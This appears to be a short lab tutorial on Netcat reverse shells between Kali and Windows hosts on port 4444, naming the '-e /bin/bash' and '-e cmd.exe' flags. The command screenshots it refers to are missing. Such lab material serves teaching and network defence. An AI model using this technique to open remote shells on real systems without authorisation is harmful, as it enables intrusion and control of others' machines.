NETCAT REVERSE SHELL
- Layout topology for this exercise:
- In this case Netcat is used for remote administration, sending a reverse shell to a listening host. A reverse shell would be useful when a router or firewall is present between the two hosts.
- The fact that the remote shell is sent across a corporate router or firewall warns about the recommendation that outgoing traffic from a network should be watched as carefully as incoming traffic.
3.1 - Reverse shell from Kali to Windows
- Windows is listening on port 4444:
- Kali sends to Windows's port 4444 a reverse shell (-e /bin/bash), meaning that all stdin, stdout and stderr will be redirected to Windows, instead of redirecting them to the default console:
- As a consequence, after the connection is established, Windows enjoys a command shell from Kali, being able to perform a remote administration:
3.2 - Reverse shell from Windows to Kali
- In the same way than before, now Kali is listening on port TCP 4444:
- Windows sends to Kali a reverse shell (-e cmd.exe) to port 4444
- As a consequence, Kali is able to administrate remotely Windows, because a Windows command line prompt is opened in its own console:
